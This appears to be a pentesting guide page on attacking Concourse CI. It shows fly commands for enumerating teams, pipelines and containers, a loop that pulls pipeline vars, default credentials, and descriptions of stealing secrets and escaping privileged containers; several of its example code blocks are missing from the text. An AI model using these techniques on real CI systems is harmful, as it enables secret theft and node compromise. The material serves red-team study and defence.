Concourse Enumeration & Attacks
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Concourse comes with five roles:
Concourse Admin: This role is only given to owners of the main team (default initial concourse team). Admins can configure other teams (e.g.: fly set-team
, fly destroy-team
...). The permissions of this role cannot be affected by RBAC.
owner: Team owners can modify everything within the team.
member: Team members can read and write within the teams assets but cannot modify the team settings.
pipeline-operator: Pipeline operators can perform pipeline operations such as triggering builds and pinning resources, however they cannot update pipeline configurations.
viewer: Team viewers have "read-only" access to a team and its pipelines.
Moreover, the permissions of the roles owner, member, pipeline-operator and viewer can be modified configuring RBAC (configuring more specifically it's actions). Read more about it in: https://concourse-ci.org/user-roles.html
Note that Concourse groups pipelines inside Teams. Therefore users belonging to a Team will be able to manage those pipelines and several Teams might exist. A user can belong to several Teams and have different permissions inside each of them.
In the YAML configs you can configure values using the syntax ((_source-name_:_secret-path_._secret-field_))
.
From the docs: The source-name is optional, and if omitted, the cluster-wide credential manager will be used, or the value may be provided statically.
The optional _secret-field_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.
Moreover, the secret-path and secret-field may be surrounded by double quotes "..."
if they contain special characters like .
and :
. For instance, ((source:"my.secret"."field:1"))
will set the secret-path to my.secret
and the secret-field to field:1
.
Static vars can be specified in tasks steps:
Or using the following fly
arguments:
-v
or --var
NAME=VALUE
sets the string VALUE
as the value for the var NAME
.
-y
or --yaml-var
NAME=VALUE
parses VALUE
as YAML and sets it as the value for the var NAME
.
-i
or --instance-var
NAME=VALUE
parses VALUE
as YAML and sets it as the value for the instance var NAME
. See Grouping Pipelines to learn more about instance vars.
-l
or --load-vars-from
FILE
loads FILE
, a YAML document containing mapping var names to values, and sets them all.
There are different ways a Credential Manager can be specified in a pipeline, read how in https://concourse-ci.org/creds.html. Moreover, Concourse supports different credential managers:
Note that if you have some kind of write access to Concourse you can create jobs to exfiltrate those secrets as Concourse needs to be able to access them.
In order to enumerate a concourse environment you first need to gather valid credentials or to find an authenticated token probably in a .flyrc
config file.
To login you need to know the endpoint, the team name (default is main
) and a team the user belongs to:
fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]
Get configured targets:
fly targets
Get if the configured target connection is still valid:
fly -t <target> status
Get role of the user against the indicated target:
fly -t <target> userinfo
Note that the API token is saved in $HOME/.flyrc
by default, you looting a machines you could find there the credentials.
Get a list of the Teams
fly -t <target> teams
Get roles inside team
fly -t <target> get-team -n <team-name>
Get a list of users
fly -t <target> active-users
List pipelines:
fly -t <target> pipelines -a
Get pipeline yaml (sensitive information might be found in the definition):
fly -t <target> get-pipeline -p <pipeline-name>
Get all pipeline config declared vars
for pipename in $(fly -t <target> pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t <target> get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done
Get all the pipelines secret names used (if you can create/modify a job or hijack a container you could exfiltrate them):
List workers:
fly -t <target> workers
List containers:
fly -t <target> containers
List builds (to see what is running):
fly -t <target> builds
admin:admin
test:test
In the previous section we saw how you can get all the secrets names and vars used by the pipeline. The vars might contain sensitive info and the name of the secrets will be useful later to try to steal them.
If you have enough privileges (member role or more) you will be able to list pipelines and roles and just get a session inside the <pipeline>/<job>
container using:
With these permissions you might be able to:
Steal the secrets inside the container
Try to escape to the node
Enumerate/Abuse cloud metadata endpoint (from the pod and from the node, if possible)
If you have enough privileges (member role or more) you will be able to create/modify new pipelines. Check this example:
With the modification/creation of a new pipeline you will be able to:
Steal the secrets (via echoing them out or getting inside the container and running env
)
Escape to the node (by giving you enough privileges - privileged: true
)
Enumerate/Abuse cloud metadata endpoint (from the pod and from the node)
Delete created pipeline
This is similar to the previous method but instead of modifying/creating a whole new pipeline you can just execute a custom task (which will probably be much more stealthier):
In the previous sections we saw how to execute a privileged task with concourse. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex".
In the following PoC we are going to use the release_agent to escape with some small modifications:
As you might have noticed this is just a regular release_agent escape just modifying the path of the cmd in the node
A regular release_agent escape with a minor modification is enough for this:
Even if the web container has some defenses disabled it's not running as a common privileged container (for example, you cannot mount and the capabilities are very limited, so all the easy ways to escape from the container are useless).
However, it stores local credentials in clear text:
You cloud use that credentials to login against the web server and create a privileged container and escape to the node.
In the environment you can also find information to access the postgresql instance that concourse uses (address, username, password and database among other info):
This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before
By default each concourse worker will be running a Garden service in port 7777. This service is used by the Web master to indicate the worker what he needs to execute (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections:
It's just exposed locally (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can talk to each Garden service inside each worker.
The web server is monitoring the running containers every few seconds, and unexpected containers are deleted. So if you want to run a custom container you need to tamper with the communication between the web server and the garden service.
Concourse workers run with high container privileges:
However, techniques like mounting the /dev device of the node or release_agent won't work (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated.
In the previous section we saw how to escape from a privileged container, so if we can execute commands in a privileged container created by the current worker, we could escape to the node.
Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it.
Getting inside a running privileged container
Creating a new privileged container
You can very easily create a new container (just run a random UID) and execute something on it:
However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers:
https://concourse-ci.org/vars.html
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)